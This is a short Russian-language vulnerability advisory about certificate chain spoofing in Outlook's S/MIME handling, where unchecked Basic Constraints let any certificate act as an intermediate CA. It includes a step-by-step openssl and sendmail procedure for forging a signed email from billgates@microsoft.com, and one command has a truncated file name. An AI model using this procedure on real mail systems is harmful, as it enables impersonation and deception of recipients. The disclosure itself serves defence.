В связке Outlook/MIME можно организовать
подмену сертификатов (certificate chain spoofing attack), несмотря на заявление Microsoft, что IE является единственным уязвимым приложением. Уязвимость позволяют любому
представлять верную цифровую подпись в электронном сообщении, которую просмотрит Outlook без каких либо предупреждений. Пример:
Атакующий создает некорректную цепочку сертификатов:
[Issuer:VeriSign | Subject:VeriSign] > [Issuer:VeriSign |
Subject:www.thoughtcrime.org] > [Issuer:www.thoughtcrime.org |
Subject:Bill Gates/billgates@microsoft.com]
Кроме того, Outlook не в состоянии проверять Основные Ограничения (Basic Constraints) на промежуточный сертификат и принимает такой сертификат как правильный. Уязвимость не делает никакого различия между подписанной и не подписанной электронной почтой в Outlook. Пользователи, которые должны использовать Outlook для
получения подписанных сообщений, должны вручную просмотреть и проверить полученные цепочки сертификатов за последние пять лет. Эксплоит:
- Поместите допустимый CA сертификат и секретный ключ в файл "middle.pem".
- Создайте поддельный сертификат, подписывая запрос:
openssl genrsa -out key.pem 1024
openssl req -new -key key.pem -out leaf.c - Подпишите CSR с вашим "промежуточным" сертификатом:
openssl x509 -req -in leaf.csr -CA middle.pem -CAkey middle.pem -CAcreateserial -out leaf.pem - Подпишите поддельное E-mail сообщение:
openssl smime -sign -in mail.txt -text -out mail.msg -signer leaf.pem -inkey key.pem -certfile middle.pem -from billgates@microsoft.com -to whomever@wherever.com -subject "SM Exploit" - Пошлите сообщение:
cat mail.msg | sendmail whomever@wherever.com
Уязвимость обнаружена в Outlook Express 5.